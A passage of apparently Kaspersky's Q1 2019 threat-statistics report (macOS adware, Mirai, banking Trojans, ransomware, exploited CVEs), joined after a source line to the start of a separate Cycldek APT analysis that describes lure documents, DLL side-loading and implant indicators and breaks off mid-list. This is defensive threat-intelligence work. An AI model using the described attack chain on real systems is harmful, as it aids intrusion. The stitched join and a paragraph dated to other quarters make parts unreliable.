As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a and AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b.\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Cimpli family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. 
The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. 
\n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. 
Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware being downloaded to the victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p.\n\n## Financial threats\n\n### Quarterly 
highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by 
banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_* Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. 
The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. 
Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). 
\n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 | \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 | \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ 
(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. 
Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the SOAP WSDL parser caused malicious code to be injected and the computer to be infected. Microsoft Office vulnerabilities are overrepresented in the statistics partly due to the emergence of openly available generators of malicious documents that exploit these vulnerabilities.\n\nIn Q1, the share of detected vulnerabilities in browsers amounted to 14%, almost five times less than for Microsoft Office. Exploiting browser vulnerabilities is often difficult, since browser developers are forever coming up with new options to safeguard against certain types of vulnerabilities, while the techniques for bypassing them often require the use of entire vulnerability chains to achieve the objective, which significantly increases the cost of such attacks.\n\nHowever, this does not mean that sophisticated attacks on browsers do not exist. A prime example is the actively exploited zero-day vulnerability [CVE-2019-5786](<https://securityaffairs.co/wordpress/82058/hacking/chrome-zero-day-cve-2019-5786.html>) in Google Chrome. 
To bypass sandboxes, it was [used in conjunction](<https://www.zdnet.com/article/proof-of-concept-code-published-for-windows-7-zero-day/>) with an additional exploit for the vulnerability in the win32k.sys driver ([CVE-2019-0808](<https://securityaffairs.co/wordpress/82428/hacking/cve-2019-0808-win-flaw.html>)), with the targets being users of 32-bit versions of Windows 7.\n\nIt is fair to say that Q1 2019, like the quarter before it, was marked by a large number of zero-day targeted attacks. Kaspersky Lab researchers found an actively exploited zero-day vulnerability in the Windows kernel, which was assigned the ID [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>). This vulnerability stems from race conditions caused by a lack of thread synchronization during undocumented system calls, resulting in a use-after-free. It is worth noting that [CVE-2019-0797](<https://securelist.com/cve-2019-0797-zero-day-vulnerability/89885/>) is the fourth zero-day vulnerability for Windows found by Kaspersky Lab in recent months.\n\nA remarkable event at the beginning of the year was the discovery by researchers of the [CVE-2018-20250](<https://www.tenable.com/blog/winrar-absolute-path-traversal-vulnerability-leads-to-remote-code-execution-cve-2018-20250-0>) vulnerability, which had existed for 19 years in the module for unpacking ACE archives in the WinRAR utility. This component lacks sufficient checks of the file path, and a specially created ACE archive allows cybercriminals to inject an executable file into the system autorun directory. The vulnerability was immediately used to start distributing malicious archives.\n\nDespite the fact that two years have passed since the vulnerabilities in the FuzzBunch exploit kit (EternalBlue, EternalRomance, etc.) were patched, these attacks still occupy all the top positions in our statistics. 
This is facilitated by the ongoing growth of malware that uses these exploits as a vector to distribute itself inside corporate networks.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries that are sources of web-based attacks:\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q1 2019, Kaspersky Lab solutions blocked **843,096,461** attacks launched from online resources located in 203 countries across the globe. **113,640,221** unique URLs were recognized as malicious by Web Anti-Virus components.\n\n**_Distribution of web attack sources by country, Q1 2019_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172506/en-web-attack-source.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US.\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Venezuela | 29.76 \n2 | Algeria | 25.10 \n3 | Greece | 24.16 \n4 | Albania | 23.57 \n5 | Estonia | 20.27 \n6 | Moldova | 20.09 \n7 | Ukraine | 19.97 \n8 | Serbia | 19.61 \n9 | Poland | 18.89 \n10 | Kyrgyzstan | 18.36 \n11 | Azerbaijan | 18.28 \n12 | Belarus | 18.22 \n13 | Tunisia | 18.09 \n14 | Latvia | 17.62 \n15 | Hungary | 17.61 \n16 | Bangladesh | 17.17 \n17 | Lithuania | 16.71 \n18 | Djibouti | 16.66 \n19 | Reunion | 16.65 \n20 | Tajikistan | 16.61 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.\n\nOn average, 13.18% of Internet user computers worldwide experienced at least one **Malware-class** attack.\n\n**_Geography of malicious web attacks in Q1 2019 (percentage of attacked users)_**[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172633/en-web-attacks-map.png>)\n\n## Local threats\n\n_Statistics on local infections of user computers are an important indicator. 
They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives._\n\nIn Q1 2019, our File Anti-Virus detected **247,907,593** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **% of attacked users**** \n---|---|--- \n1 | Uzbekistan | 57.73 \n2 | Yemen | 57.66 \n3 | Tajikistan | 56.35 \n4 | Afghanistan | 56.13 \n5 | Turkmenistan | 55.42 \n6 | Kyrgyzstan | 51.52 \n7 | Ethiopia | 49.21 \n8 | Syria | 47.64 \n9 | Iraq | 46.16 \n10 | Bangladesh | 45.86 \n11 | Sudan | 45.72 \n12 | Algeria | 45.35 \n13 | Laos | 44.99 \n14 | Venezuela | 44.14 \n15 | Mongolia | 43.90 \n16 | Myanmar | 43.72 \n17 | Libya | 43.30 \n18 | Bolivia | 43.17 \n19 | Belarus | 43.04 \n20 | Azerbaijan | 42.93 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a 
percentage of all unique users of Kaspersky Lab products in the country._\n\nThese statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.\n\nOn average, 23.62% of user computers globally faced at least one **Malware-class** local threat in Q1.\n\n_Source: "IT threat evolution Q1 2019. Statistics", Securelist, published 2019-05-23, _[https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/](<https://securelist.com/it-threat-evolution-q1-2019-statistics/90916/>)\n\n## Key findings\n\nWhile investigating attacks related to a group named Cycldek post 2018, we were able to uncover various pieces of information on its activities that were not known thus far. In this blog post we aim to bridge the knowledge gap on this group and provide a more thorough insight into its latest activities and modus operandi. 
Here are some key insights that will be described in this publication:\n\n * Cycldek (also known as Goblin Panda and Conimes) has been active in the past two years, conducting targeted operations against governments in Southeast Asia.\n * Our analysis shows two distinct patterns of activity, indicating the group consists of two operational entities that are active under a mutual quartermaster.\n * We were able to uncover an extensive toolset for lateral movement and information stealing used in targeted networks, consisting of custom and unreported tools as well as living-off-the-land binaries.\n * One of the newly revealed tools is named USBCulprit and has been found to rely on USB media in order to exfiltrate victim data. This may suggest Cycldek is trying to reach air-gapped networks in victim environments or relies on physical presence for the same purpose.\n\n## Background\n\nCycldek is a long-known Chinese-speaking threat actor. Based on the group's past activity, it has a strong interest in Southeast Asian targets, with a primary focus on large organizations and government institutions in Vietnam. This is evident from a series of targeted campaigns that are publicly attributed to the group, as outlined below:\n\n * 2013 - indicators affiliated to the group were found in a network of a technology company operating in several sectors, as briefly [described](<https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-august-goblin-panda/>) by CrowdStrike.\n * 2014 - further accounts by CrowdStrike describe vast activity by the group against Southeast Asian organizations, most notably Vietnam. 
The campaigns made prominent use of Vietnamese-language lure documents, delivering commodity malware like PlugX, that was typically leveraged by Chinese-speaking actors.\n * 2017 - the group was witnessed launching attacks using RTF lure documents with political content related to Vietnam, dropping a variant of a malicious program named NewCore RAT, as [described](<https://www.fortinet.com/blog/threat-research/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations.html>) by Fortinet.\n * 2018 - attacks have been witnessed in government organizations across several Southeast Asian countries, namely Vietnam, Thailand and Laos, using a variety of tools and new TTPs. Those include usage of the Royal Road builder, developed versions of the NewCore RAT malware and other unreported implants. These were the focus of intel reports available to Kaspersky's Threat Intelligence Portal subscribers since October 2019, and will be the subject matter of this blog post.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122651/cycldek_bridging_01.png>)\n\n**_Figure 1: Timeline of Cycldek-attributed attacks._**\n\nMost attacks that we observed after 2018 start with a politically themed RTF document built with the 8.t document builder (also known as 'Royal Road') and sent as a phishing mail to the victims. These documents are bundled with 1-day exploits (e.g. CVE-2012-0158, CVE-2017-11882, CVE-2018-0802) which in turn run a dropper for three files:\n\n * a legitimate signed application, usually related to an AV product, e.g. QcConsol (McAfee's QuickClean utility) and wsc_proxy.exe (Avast's remediation service).\n * a malicious DLL which is side-loaded by the former application.\n * an encrypted binary which gets decrypted and executed by the DLL.\n\nThe final payload that is run in memory is malware known as NewCore RAT. 
It is based on an open-source framework named PcShare or PcClient that used to be prevalent in Chinese hacker forums more than a decade ago. Today, the software is fully available on [Github](<https://github.com/xdnice/PCShare>), allowing attackers to leverage and modify it for their needs.\n\nIn the case of Cycldek, the first public accounts of the group's usage of NewCore date back to 2017. As described in a blog post by Fortinet, the malware provides the attacker with broad capabilities such as conducting a range of operations on files, taking screenshots, controlling the machine via a remote shell and shutting down or restarting the system.\n\n## Two implants, two clusters\n\nWhen inspecting the NewCore RAT malware delivered during the various attacks we investigated, we were able to distinguish between two variants. Both were deployed as side-loaded DLLs and shared multiple similarities, both in code and behavior. At the same time, we noticed differences that indicate the variants could have been used by different operators.\n\nOur analysis shows that the underlying pieces of malware and the way they were used form two clusters of activity. As a result, we named the variants BlueCore and RedCore and examined the artifacts we found around each one in order to profile their related clusters. 
Notable characteristics of each cluster's implant are summarized in the table below.\n\n| **BlueCore** | **RedCore** \n---|---|--- \nInitial Infection Vector | RTF documents | Unknown \nLegitimate AV Utility | QcConcol.exe (McAfee's QuickClean utility) | wsc_proxy.exe (Avast's remediation application) \nSide-Loaded DLL | QcLite.dll | wsc.dll \nPayload Loader | stdole.tlb - contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm - contains PE loading shellcode and an encrypted RedCore binary \nInjected Process | dllhst3g.exe | explorer.exe or winlogon.exe \nConfiguration File | %APPDATA%\\desktop.ini | C:\\Documents and Settings\\All Users\\Documents\\desktop.ini or C:\\Documents and Settings\\All Users\\Documents\\desktopWOW64.ini \nMutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} \nCommunicated URL Scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s \n \n**_Table 1: Comparison of BlueCore and RedCore loader and implant traits._**\n\nAs demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution. 
By comparing code in both implants, we can find multiple functions that originate from the PCShare RAT; however, several others (like the injection code in the figure below) are proprietary and show identical code that may have been written by a shared developer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)\n\n_Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._\n\nMoreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implants' raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)\n\n_Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._\n\nHaving said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:\n\n * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10ms to an internal buffer of size 65530. 
